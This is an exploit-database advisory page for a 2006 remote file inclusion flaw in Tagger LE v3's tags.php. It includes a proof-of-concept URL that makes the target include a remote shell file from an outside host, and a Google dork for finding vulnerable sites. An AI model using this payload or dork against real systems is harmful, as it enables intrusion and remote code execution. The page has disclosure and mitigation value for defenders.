header-logo
Suggest Exploit
vendor:
Tagger LE
by:
Morgan
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Tagger LE
Affected Version From: v3
Affected Version To: v3
Patch Exists: NO
Related CWE: N/A
CPE: a:venturenine:tagger_le
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Tagger v3 <= BBCodeFile Remote file inclusion

Tagger v3 is vulnerable to a remote file inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of maliciously crafted files. Additionally, the application should be configured to only include files from trusted sources.
Source

Exploit-DB raw data:

Tagger v3 <= BBCodeFile Remote file inclusion

Discovered by : Morgan

Error in : tags.php
include($BBCodeFile);

Vendor Website: http://www.venturenine.com

PoC: 
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?

Google dork:

intitle:"Tagger LE" inurl:tags.php

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan 

# milw0rm.com [2006-08-09]

Navigation

Suggest Exploit

Services By CQR